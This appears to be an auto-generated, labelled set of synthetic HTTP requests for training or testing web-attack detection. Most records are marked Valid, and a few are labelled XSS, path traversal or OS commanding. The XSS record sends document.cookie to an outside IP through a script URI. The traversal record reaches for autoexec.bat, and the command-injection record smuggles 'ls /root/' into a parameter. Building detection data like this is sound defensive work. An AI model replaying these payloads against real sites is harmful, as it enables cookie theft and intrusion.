GET /iFAzVa583.Pf/rVOxl6oShFo/ooEoesbaige/ElYlocationPGvZIPpST/FWH@D@it2ZxMJmt/2OQgRxar-75/yA5casoFno/zEElee/2ADy@9G.shtml?taheCxlRnsot=45186&ROmtelnetFbLMt1e=41014&2Dboot.ini0a=on&9paoaGs5Itno=03&faicicte=formenve0da&wgetDKdhJ@=n%3Cus6aDwloi8&3iaeasfs=zyievalw+tcinsertd70xp_&t9dseee=iBeeaeiTnashae9eh&JOUr=eUi6ne&aLnserhspf7ohrt=lezi9elrcdhs%3B&te2mcpib=isrshkrmho8ix&eim=aTOneiqu&enrihsy=amfa&drutnfs6es=eb%2F&VM-NTdocument=254325 HTTP/1.0
Host: 93.74.180.222
Connection: keep-alive
Accept: audio/*;q=0.4, application/*
Accept-Charset: euc-kr;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: Eeesre-0a5libeu;q=0.1
Cache-Control: max-stale=30987
Client-ip: 219.140.164.41
Cookie: sts5ncrieeIb=a9vnr vd@
Cookie2: $Version="033"
Date: Tue, 30 Nov 04 11:34:01 CET
ETag: "ZgWQTPE9_DTxzCl"
Expect: 100-continue
From: foniz@txtCtS.de
If-Modified-Since: Fri, 20 Nov 09 10:39:17 CET
If-Unmodified-Since: Fri, 29 Feb 08 24:22:40 UTC
If-Match: *
If-None-Match: "YovDsc5PHn0Czbwl._f1"
If-Range: Mon, 02 Feb 04 21:00:44 CET
Max-Forwards: 4318
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM bm52ZXVGYzJvdGloNWh5bXRhb3NpdG9mdnJhdHNSaWE=
Authorization: Digest nonce
Range: 9874-87885
Referer: /Teolniat.ace
TE: chunked
Trailer: Pragma
User-Agent: i2O57J http://www.r7Ehs.fr
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 6.9 www.ffr05bAz.png
Transfer-Encoding: compress
Upgrade: net/2.1
Warning: 078 www.povi.tiff "lsoNrm" "Mon, 05 Apr 04 01:58:32 UTC"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10344
Start - Id: 47963
class: XSS
GET /cEEhhQcI5xzcN3GZ.U3J/ske9Ulaecyheiinh.cfm?hgii7rseh=cud&cdaalzsdmr5tder=i&Eantsfdlw=a%28thdts%5Beo%3Cacceptih&su2Emexysoioilh=eecangaqnsl&hil=mQwomS&xTlocationiL2wm=%3DeYIijhtunionkhhln%3EY&umtd=dtiljbstrbh&innktr1=copyf&85dR=%3Cimg+++src++++%3D++++%22++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F91.238.167.241%2Ftete.bin%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E&termeloednt1=hCsrco0sedlic&nyonhlelyRmgrs=er5ebtauL%3Cf&POMP5=354517&iy=si HTTP/1.1
Host: 2.9.128.41
Connection: rDpa7
Accept: */*;q=0.6
Accept-Charset: koi8;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 208.53.71.232
Cookie: heeh=yv-
Cookie2: $Version="32"
Date: Sun, 15 Feb 09 20:25:45 UTC
ETag: "09Q5lWaU@8rfp_chN"
Expect: wfi0bT8t=li0ate
From: Yhjae2L@etses6.net
If-Modified-Since: Mon, 26 Jun 06 14:17:24 UTC
If-Unmodified-Since: Mon, 29 Nov 04 11:26:06 CET
If-Match: *
If-None-Match: "OiEfMBB6sHnf83S"
If-Range: Sat, 18 Feb 06 06:58:31 UTC
Max-Forwards: 0841
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: NTLM M3gzb2lzQVhDNWJyOWNzOTNhTzIzaXNmR25xcmVvb2VtY2lMMmFtaXRpYWk=
Range: -51202
Referer: /9re5st/geuee/aunmc/mtrr.asmx
TE: trailers
Trailer: Expect
User-Agent: Mozilla/7.6 (compatible; Is8hljlnt; Unix; Rehoie0s; pndq0)
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3364x532
Via: odih/5.4 www.qnqt0yya.gif, FTP/5.8 97.92.34.30:4945
Transfer-Encoding: gzip
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47963
Start - Id: 25149
class: Valid
GET /H5rEtEms2roTw9nl1oi/56ro32rnrfcanue/1ansHe7rdgewcigd3txe/tdCantdBnaa/xKfNQhqZGH/iztldoO5yc/4Sp6Inx8Q2arz2T/nxgDRWiIVot/rrrdrEeh7hgec9haec9S.php4?tz=yh&eohdbdnhaxe9=8207527 HTTP/1.1
Host: www.ze7eei.ch
Connection: close
Accept: image/jpeg;q=0.8, audio/*;q=0.2, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: oao-Oo;q=0.9, 4e-de;q=0.0, 2Hee6-e;q=0.5, pneooai-ciajirTs;q=0.8, odSr-ope;q=0.3
Cache-Control: min-fresh=448
Client-ip: 32.228.225.57
Cookie: rwinntKFZwindow.open=ne&noscat4d ;i3lcb=ehm;titm6Hde4ca=%sdci;6aabtTd=iem;LlAsootN=ans;ymetaGrtAttelnetrhttps=106347108
Cookie2: $Version="9"
Date: Sun, 02 May 04 05:17:34 CET
ETag: W/"Ve.@D6zZ4Y6MV36UG"
Expect: peup
From: eMfiaeeO@ftisitrql.fr
If-Modified-Since: Thu, 08 Mar 07 12:44:26 CET
If-Unmodified-Since: Thu, 01 Dec 05 08:51:37 GMT
If-Match: "7WwGEXxOV3QKhSO9AGGK"
If-None-Match: *
If-Range: Tue, 17 Jul 07 17:45:03 UTC
Max-Forwards: 0172
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bnVvcmhYcGxvcnVuZ2F0YlVlcmF0aWQyaXNuY2JuckFobzA=
Authorization: Digest realm
Range: -5
Referer: http://www.seekEmnO.biz/ndfauuzo/7t3an/sMesmh5w.msf
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: hcOnLc/3.6.5.0.9
UA-CPU: Sparc
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: FTP/8.0 50.71.7.109, FTP/3.2 www.cmtede.html
Transfer-Encoding: compress
Upgrade: oulp3p/8.2
Warning: 467 www.tgndum.png:11059 "pnnhlneoaxd" 
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 3897200999
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25149
Start - Id: 18973
class: Valid
GET /hjtZkSPcBA6yFkiIO/edn7la/eN-BeEs7iBQO/te/2WiT.css?vaaFe=one&eeianrt=123066503&spshvasttPpm=f2eecjsnSt1nB4s&F.YqibGJD=mwomrhiateqiochmlw&qmmsnokhre8=p%3Co7oobject%3A&wh7i7arbifase=i0Lkh&boooiplbxme=ppt+ochildp&dd0o=13609&Cd=3635525377&A1tshrmkgNzfjhi=671 HTTP/1.0
Host: 174.59.2.164
Connection: 1nym2E
Accept: image/png, application/zip;q=0.1, application/zip
Accept-Charset: euc-tw;q=0.6, iso-8859-8;q=0.4, x-mac-chinesetrad, x-mac-arabic;q=0.3, x-mac-japanese;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: el1b3=e
Client-ip: 170.189.218.205
Cookie: 7boecuyren=69781;adwze4=EAsma]os;nyntehes0=rg-include
Cookie2: $Version="691"
Date: Mon, 28 Aug 06 12:27:35 UTC
ETag: "pKJXOgSIwdASDn5RBmBa"
Expect: snhsa=sroukt;UaSeee
From: l14gyjst@isddra.be
If-Modified-Since: Thu, 25 Jun 09 05:47:47 UTC
If-Unmodified-Since: Mon, 05 Jul 04 06:54:26 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Apr 04 19:10:51 GMT
Max-Forwards: 1
MIME-Version: 9.9
Pragma: ehieabte='1riimvt'
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: NTLM cnllYW05Z3RycE50eXQzYlVhUHBSTnNzb3BwbmJyZGV0d255ZXRzZWdObnRzbDFy
Range: 63-4,19-3,96935-
Referer: /brfUtwd/ncot.mp3
TE: gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: 0dztroubrierlmoalN
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 378x534
Via: HTTP/2.5 www.binc.png:340
Transfer-Encoding: deflate
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18973
Start - Id: 22215
class: Valid
GET /idSnglcwolNhl/bi6nTi7moDil/aoEPRjD8s2/xpOu/e0B6@ch4gDbTYN9/tdRIbYhnyarWM/p7Y@TSx/ansA6ooeoeerqja/4sxct3E/nPaEB-sibetween/of.js?hnShOlyrb1srth=to2oeysstpargSmId&raAr=zay%27&toOsHde9eeoasu=blVosoh22&talSEuocem5Ss=512836&@DybxmlhAO6QTH=Et%5C&xSOqweuHAon=eqdkaotOtfnallilul&otTose=372984&ipanezcvot=n&taoorsA9Th=02195&nrgetde8orn=16&ldsnkei=1469191060&sg=09614511 HTTP/1.0
Host: www.stexfdutae.biz
Connection: ootLffo
Accept: image/gif;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 250.180.79.172
Cookie: 9resaeeHrt=kaofamb\5m5einsertfjnueo;aledh4s0=85053001
Cookie2: $Version="2"
Date: Mon, 11 Jun 07 02:29:29 UTC
ETag: W/"JVbXKO-H7teQCYptg"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Thu, 04 Dec 08 08:52:19 CET
If-Unmodified-Since: Fri, 15 Feb 08 16:34:10 GMT
If-Match: "zsCFgiU5rYc.thPdPe"
If-None-Match: "1tdfU1uTKqLmFRRvKuL"
If-Range: "utJYPPeCgJDUW4ZQYJsb"
Max-Forwards: 0
MIME-Version: 6.8
Pragma: segteeT=9ltlituk
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: Basic aElycnJ0OmVydHU=
Range: -09
Referer: http://www.szoyE.cz/pWti/rm5q/vteae/AgtLab.php
TE: trailers
Trailer: Accept-Encoding
User-Agent: jnsdbxi8n (rbI20m5s; nsXC0r; cONNW9ZpY-; 69B2h6GqmR; pJYlz5C)
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9834x5645
Via: FTP/7.9 www.ewtr.tiff
Transfer-Encoding: Qahe; m22n7ihn=hKnre
Upgrade: 7absTi/0.9, bACcr/4.9
Warning: 471 www.ihhsmu.html:12 "iviIgox" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22215
Start - Id: 28807
class: Valid
GET /ilHivjbMyvH0f4br1/7tnt/dmwsuteJLeaaieTtdpae/oi7A0ierh9Z5nI/w_XFXSZu6Dw/oP8qaYyMgbRck@7nQyU0/processing-instructionpO8nhElt_8divhy@/oaq1aeetbeNulai/tgqadC@BSStAot/ncs/XHYWKB@9ng6T_w/open@BowG4bl.shtml?eeredh=8857854578&tetesgeys=384138166&5iEEavqtciihNes=oaccept5unetnwe3enct&imeefEfh=egFYo&l2otmMbn7iiormm=nqsinlmdtft&xolemlbxrie=utmfiicatP HTTP/1.1
Host: www.artg.gov:80
Connection: close
Accept: video/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: aScoRg2n-itaj5tm;q=0.4
Cache-Control: no-transform
Client-ip: 139.218.217.36
Cookie: at=4800981
Cookie2: $Version="73"
Date: Mon, 03 Oct 05 16:56:57 CET
ETag: "isXm--@La21v@WF3qj10"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Wed, 13 Sep 06 23:26:51 CET
If-Unmodified-Since: Sun, 14 Oct 07 12:50:45 GMT
If-Match: "5Ky8.Bvq6odWdamC"
If-None-Match: "zvg@KPMGWuuEO_YNO"
If-Range: Sun, 04 Dec 05 12:05:32 UTC
Max-Forwards: 5224
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hdae faMstat=0egsty
Authorization: NTLM bGNhcGQ4d25OaWVuZGFvZWdveHI2b3k0ZW50dHJldWVhc2U1dGw=
Range: -928062,21307-
Referer: http://www.lv6e6.fr/iwdnoa9/dymnni.css
TE: chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 7.1; 4f-hw; rv:2.8.8) Gecko/92069261
UA-CPU: MIPS
UA-Disp: 587,522,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 405x937
Via: FTP/7.9 www.lpD5A6ro.png, 0.0 222.147.187.126
Transfer-Encoding: Rmidss; cn521eth=ydNpn
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 138 233.42.208.164 "3tpedfslp8rmnsoTea" 
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 39502
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28807
Start - Id: 1612
class: Valid
GET /rZaizooaRene8Ido/ruYho8aHvusr/e-k/t_i_eJWevalgC/xearn8breWirdbaHcay.html?w9untllttGsj=i%5D&PpAt8=%5Dgeo HTTP/1.1
Host: www.jTiin.net
Connection: keep-alive
Accept: text/plain;q=0.3, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.3, gzip;q=0.2, compress, identity;q=0.6
Accept-Language: Iec5-a, rcl9a-Es;q=0.9, e-ip;q=0.1, y-e, k-chzcdVr0;q=0.7
Cache-Control: no-store
Client-ip: 171.18.209.13
Cookie: 9r=efpt3allgI1;meJpifsra8n=1-tnpie vctt;bifsrs=aarfrSO7rtybe]ae
Cookie2: $Version="532"
Date: Fri, 06 Jan 06 24:30:51 GMT
ETag: W/"6cpkX8A2dmE5vzI0gZEY"
Expect: o870
From: ncrh@iounf.uk
If-Modified-Since: Tue, 20 Jan 04 18:34:53 UTC
If-Unmodified-Since: Sat, 30 Oct 04 07:13:59 CET
If-Match: "CkQ82VmVRAq3ShN"
If-None-Match: "dx6pClckYyEfO3a5RSW"
If-Range: "HWBxFNrBrMurE9G2"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2lFenI6eHR0bGVlYQ==
Authorization: NTLM dGxzYWxiYTlzRHVuc29xSW93ZTFlaWhQZXZld3RJbDhldHQ3aGVwcmRlOHM4bHg=
Range: 92-9906
Referer: http://www.5etaIJ.uk/uaen.php4
Trailer: Authorization
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 1.9; ar-ra; rv:2.8.6) Gecko/59412877
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color16
UA-Pixels: 784x552
Via: 0.7 www.stth.js, 3.6 www.ftxI.png, 9.3 155.141.30.198
Transfer-Encoding: es8o
Upgrade: sTSZ/4.6, yc0et/6.6
Warning: 478 www.2leHh0te.css:121 "aurisc" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1612
Start - Id: 13516
class: Valid
GET /eNiai.pl?tndd=%40%3E%3Fo%27lotEAiS&3efn4ofs3tmau=tihIitl3oybevn&ynde=reqvD7nV8V&r5yjtdre4t=835067&5r7T6ASZ9iTd=zlXa+ HTTP/1.0
Host: 186.65.81.98:80
Connection: close
Accept: application/zip;q=0.7, text/*;q=0.2, image/jpeg
Accept-Charset: big5;q=0.6, iso-8859-3, euc-tw;q=0.5
Accept-Encoding: compress, deflate, compress
Accept-Language: 3tl-gx, b-imh5he, j1o-eot;q=0.9, ESnxeAt-cteit
Cache-Control: min-fresh=42860
Client-ip: 94.84.249.225
Cookie: Oksay=879956;rCiieuatN=fzc9v e:wieDon;vGojyzratXupdate=ewD61AVJlqu;hgr8nsyo=p0ZIU9MXl;eroefomErdcu1yo=oscsehefsrsWbrck;vinecbnDuhqusr_=3
Cookie2: $Version="789"
Date: Thu, 14 Dec 06 04:39:25 CET
ETag: "QjOCpP7oR@EmEOXywx"
Expect: 100-continue
From: reyhi@itnouasdie.ch
If-Modified-Since: Sat, 21 Jan 06 03:00:41 CET
If-Unmodified-Since: Wed, 23 Jan 08 04:29:39 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: edtti iInHs=qitr6la
Authorization: Digest response="9d09AA19e68FbefD1522CAdD4b021a06"
Range: 99683-
Referer: http://www.sedaegb6.org/qsenhzl/lEiurAro/r9lB.tiff
TE: gzip;q=0.5,deflate;q=0.7
Trailer: Via
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 8.9; sU-5i; rv:6.0.9) Gecko/08672035
UA-CPU: MIPS
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 866x579
Via: FTP/8.0 www.osop.tiff, s7hf/4.1 www.whlG.gif
Transfer-Encoding: gzip
Upgrade: oih6d/1.6, uWi/2.3, crt/1.7, twSe/6.3
Warning: 707 86.35.37.2 "9TdUnnt" "Mon, 08 Jan 07 05:09:18 UTC"
X-Forwarded-For: 101.72.118.178
X-Serial-Number: 15129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13516
Start - Id: 354
class: Valid
GET /CZCJaX48pT@IH4..php?32ujtn7nt=ih1a+&egseen=6&r84hlec=54&esowsjasttssson=abyhm6iasm&5n8Sae=cr%3FEts%28mtao&ntntwVtEuixnt=fHncnsns&tbobicghsr=hl%25uall3anmconnect&nadh=r3ecotter0tcohae&jee=%2Fnc5&aonroTi=10977899&etoehacEn=IhchildNsTbr%3Em&pbneeendea0=%27%29%3Da HTTP/1.0
Host: www.nettoor.biz
Connection: keep-alive
Accept: text/plain;q=0.9
Accept-Charset: x-mac-ce;q=0.3, cp-932;q=0.9, iso-8859-5, x-mac-turkish, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: sHs1am-ord5;q=0.3, bfStyt-hebminr2;q=0.9, e-y28qe2;q=0.5
Cache-Control: no-store
Client-ip: 93.170.228.79
Cookie: k7e2eaa3elnse=nNr;ras=i
Cookie2: $Version="2"
Date: Sat, 02 Dec 06 03:06:19 UTC
ETag: "CV0COPDdiX@O0-_BLI"
Expect: 100-continue
From: fSh4c3s@1lere.gov
If-Modified-Since: Mon, 26 May 08 07:28:56 UTC
If-Unmodified-Since: Sat, 14 Feb 04 13:39:32 GMT
If-Match: *
If-None-Match: "6kNj6Nu.MkTSuhot"
If-Range: Sat, 01 Jan 05 17:11:18 UTC
Max-Forwards: 33
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: Digest algorithm=MD5
Range: -723325,-8,2410-
Referer: /ndW3ana.gif
TE: chunked;q=0.0
Trailer: Via
User-Agent: Mozilla/9.5 (Windows; U; Win98 2.9; yr-lr; rv:2.6.7) Gecko/50826654
UA-CPU: MIPS
UA-Disp: 6838,2277,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 170x4525
Via: FTP/8.7 213.228.156.180
Transfer-Encoding: t0hn; hshe=trRsl
Upgrade: nbdb/2.5, ows/3.4, aiNTa/6.6
Warning: 856 133.9.23.161 "adbfddinDnmgns" "Wed, 17 Feb 10 19:40:50 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 21682850454988590168
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 354
Start - Id: 2452
class: Valid
GET /ltlSefItajle/rRmdswhsLrsii7ezrz.jpeg? HTTP/1.1
Host: 230.156.57.132
Connection: lhho1e
Accept: video/quicktime;q=0.0, application/rtf, text/html;q=0.2
Accept-Charset: iso-2022-kr, x-mac-arabic, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: dhs=ies
Client-ip: 37.176.251.14
Cookie: Td0ha9daoht=SwiovestsShe;yho5gg6iu1rtq1i=703855;dexecl3=eaaPoc
Cookie2: $Version="76"
Date: Wed, 24 Sep 08 03:11:53 GMT
ETag: W/"ZCj64kCP90U_7@j"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Sun, 27 Nov 05 06:16:42 UTC
If-Unmodified-Since: Mon, 31 Aug 09 04:28:00 GMT
If-Match: *
If-None-Match: *
If-Range: "e6BYd0ekkhf6b0lNvMRd"
Max-Forwards: 185
MIME-Version: 8.3
Pragma: sniUso=ri9
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM VG9qb3NzdDdzdGRsd2xUZ25oeWoxaHI4b2JheWkyU3NudWU2bGw4aQ==
Range: 87817-,2898-
Referer: http://n5eI.be/rtldmuso.shtml
TE: chunked
Trailer: Transfer-Encoding
User-Agent: lpoN/4.3.5
UA-CPU: x86
UA-Disp: 097,5060,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 750x609
Via: 0.9 www.srhB.gif, HTTP/1.7 20.158.248.249
Transfer-Encoding: gzip
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 416 www.pteq.html "largswoidrewai" "Wed, 11 Aug 04 24:11:21 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2452
Start - Id: 45933
class: PathTransversal
GET /Uj/lb/up7smov9nua4get/H7Ioerrltn.swf?h3lkkeb5tae=58217&ic5oes=gyM7J6h&Seejsy=tBk4O8&rjz.C1ZbSp=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&dz7T60=176 HTTP/1.0
Host: www.0nWa.de
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: utf-7;q=0.1, euc-jp;q=0.7, x-mac-icelandic
Accept-Encoding: 
Accept-Language: eRpi2-siya34, Benuoxt-eu, scs-dida, iaO-cl;q=0.8
Cache-Control: no-transform
Client-ip: 200.168.211.189
Cookie2: $Version="239"
Date: Thu, 08 Oct 09 12:02:01 UTC
ETag: W/"u55RZ65BYdnj8rC0"
Expect: o0drmoa
From: oeeo@awOyreEpb3.st
If-Modified-Since: Sun, 29 Jun 08 21:12:49 UTC
If-None-Match: "pCV7_RHQnEZ3Wfi"
Max-Forwards: 5
Pragma: r8Oe='ain'
Authorization: iIeSh h5Sth=uuge
Referer: /rtonso/6ornov.bin
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 1.6; me-s7; rv:2.8.8) Gecko/37820446
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: HTTP/9.1 149.126.181.36, 5.2 www.a0mywey.jpg:6, 3.7 www.gunaomL.html
Transfer-Encoding: telre
Warning: 301 www.foehiLHu.gif "dqnsc" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45933
Start - Id: 20324
class: Valid
GET /dbAE9A1i.QRQ.css?-t37zUva7T=ioofn%29aesam&aai8fNjhH=to0&Teah=7019&8nadtsd2=0&d4o=en&baxe2otru9ins=ep&yga=Et&ohnmnni=etr8egrNiethL&indmi4h=8086&Aeckn=lAtBeH9Dg-&a7y=93858756 HTTP/1.1
Host: www.gnrwsThf.gov:80
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, iso-8859-4;q=0.3, euc-jp;q=0.9
Accept-Encoding: identity
Accept-Language: *
Cache-Control: min-fresh=675
Client-ip: 222.88.81.122
Cookie: hmfeethnmb=g(;uthty6=59;wefH62icczoaeX=6;cs=91;n3asi=Obe)nn]mamT4 8emqxmlt
Cookie2: $Version="18"
Date: Wed, 15 Jun 05 10:02:27 GMT
ETag: "4NcBAHXrh7kq4r4e"
Expect: 100-continue
From: 9qbyo33@htvnn.org
If-Modified-Since: Mon, 16 Jan 06 23:07:53 UTC
If-Unmodified-Since: Tue, 13 Jul 04 13:09:48 UTC
If-Match: *
If-None-Match: "6oB.5SJ.oR7g2tPXnBLA"
If-Range: "5XYW4zB_1b73bssA"
Max-Forwards: 46
MIME-Version: 6.6
Pragma: Deuf='wseM'
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: NTLM Y29lb3RhdGhrbDVUUnJCYW9pZXdlYXQ5aWlieHRCdWhlc3RxZWN0YnAyaDNtYw==
Range: 39-4,79168-,7750-8
Referer: /smbrsl/otiEEasr.php4
TE: deflate,gzip
Trailer: Transfer-Encoding
User-Agent: h9so/4.6.8
UA-CPU: PowerPC
UA-Disp: 2892,8834,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5764x832
Via: FTP/1.6 118.210.178.145
Transfer-Encoding: gzip
Upgrade: ha6gn/0.9, tetpr/6.4, exend/4.5, i4dR/0.3
Warning: 912 241.22.51.255 "taWienmcemueh" 
X-Forwarded-For: 115.210.125.144
X-Serial-Number: 696774
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20324
Start - Id: 4996
class: Valid
PUT /LxyXXwwinntc/nEZCD14KLqc6VWw98wyt/5zAWjT3DN_scripts/4teepEw7cVeoH/s9zIPm7PCeIj6s/ux6hzzScd/s.CYWlWAF/cruhir3/x5U/tlDoxS0kM3dAOhm@0dx4/odi5areh.asmx? HTTP/1.0
Content-Length: 232
Content-Language: nio
Content-Encoding: compress
Content-Location: http://Tran.de/eOrnIs/cenwwuo.js
Content-MD5: Z2RhZTV1aG51b3QzZWV1bA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Jan 07 13:03:48 CET
Last-Modified: Wed, 06 Apr 05 22:53:33 GMT
Host: www.htetsu.com:80
Connection: poeheh
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=380
Client-ip: 238.101.102.46
Cookie: nM31U9PssS=joebrMhiaah45;pwindow.openQ5rdxp_T=ters;nse=qkNkexb;Tjlrlenmonu=x7tNDK1
Cookie2: $Version="23"
Date: Sun, 14 Jan 07 14:29:56 GMT
ETag: W/"2vOl.id7V-JKm72nt"
Expect: 100-continue
From: her7cr@helyhe.it
If-Modified-Since: Thu, 28 Jun 07 19:09:19 UTC
If-Unmodified-Since: Wed, 26 Oct 05 07:54:33 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Jan 08 23:35:00 UTC
Max-Forwards: 3002
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: re1s oeyla=tamzuv0w
Authorization: 81ua twrn=orke
Range: 57136-3
Referer: http://antaeho.st/qeak/teis8E/xNufIFu.swf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.9 (compatible; Konqueror/0.9; WinNT; n7HotHm0sa; vtFularr)
UA-CPU: 68000
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: HTTP/0.4 161.3.75.169, 9.4 www.haNsluaA.tiff
Transfer-Encoding: deflate
Upgrade: hMr/2.1, sbroy7/3.5, sa4aS8/1.4, Tm12uo/1.4, R6cee/4.7
Warning: 599 www.erzlDl.htm "keenmTtpwuriveed" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: -----------------------
~~~~~: ~~~~~~~~~~~

sms=lR e0cpsnS1pl>&8nbeiu3k3exausw=ons&9Da1aEGXreplaceK=uuDe2saLxDA&eEaavhadda=@7fwhnullnuo&taDsoqnria=88&tta1b5re7m=rh6qT-&itDameOtnr=hALD@swlV&lllo=6ec&rsolraf=375516582&feear7assrrlfe=visd7atElohisou0x&9nniE5euNTom=u&moh=Ed

End - Id: 4996
Start - Id: 43369
class: OsCommanding
GET /lafmU8jmntnZ/doJodU@aGDjItDv/ttOwifkwroAt2ptsehze/slt/uentrdo4sdm/deo6nqnmshites/LuGcopyuWiv9M/asl/.h0linkpaS8Kb.jsp?toInhnrtidlxia=il1Ineae8flfetha&awxHdeinIsie=%5Cnls++%2Froot%2F&nimatett3=tipai&o0uge4Wsn=b%3Ersaccess_logoo%28%40s%3Dghi1sock_stream8shutdownrp&Nmwsam=9IacceptfweestRjin HTTP/1.0
Host: www.schojahGse.de
Connection: Uoewihts
Accept: */*
Accept-Charset: shift_jis, cp-950, utf-8, x-mac-greek;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 255.185.181.53
Cookie: amon7eFsvuuC=88;boErsvned=sew4ohnasa;oEcpfiosy=5;eEecbHo=aHig9rhnxe
Cookie2: $Version="002"
Date: Tue, 27 Dec 05 02:55:18 GMT
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: grhrm
From: xrca@p4bIo.st
If-Modified-Since: Thu, 29 Apr 04 21:49:04 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
